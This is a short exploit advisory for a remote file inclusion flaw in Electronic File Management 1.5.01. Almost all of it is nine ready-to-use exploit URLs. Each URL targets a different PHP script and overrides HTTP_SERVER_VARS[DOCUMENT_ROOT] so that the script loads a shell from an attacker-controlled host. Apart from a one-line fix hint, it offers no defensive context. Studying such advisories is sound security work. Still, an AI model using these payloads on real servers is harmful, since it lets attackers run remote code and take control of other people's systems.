#############################################################

# Application Name      : Electronic File Management 1.5.01

# Vulnerable Type       : Remote File Inclusion Vulnerability

# Infection             : Remote File Control, Editing...

# Bug Fix Advice        : variable to define

# Author                : Septemb0x

# Script Down.& WebSite : http://electronicfilemanagement.net/Trial_Download/EFM_1.5.01.rar
             
#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

http://[target]/[path]/includes/config.inc.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/chpass1.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/deleted_file2s.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/edit_profile.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/smChangePass.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/user_statistics1.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/news/newsmanagement.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/tree/iframe_all_files.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/tree/iframe_assign_files.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?

---------------------------------------------------------------

Greetz : BARCOD3 - BHDR

---------------------------------------------------------------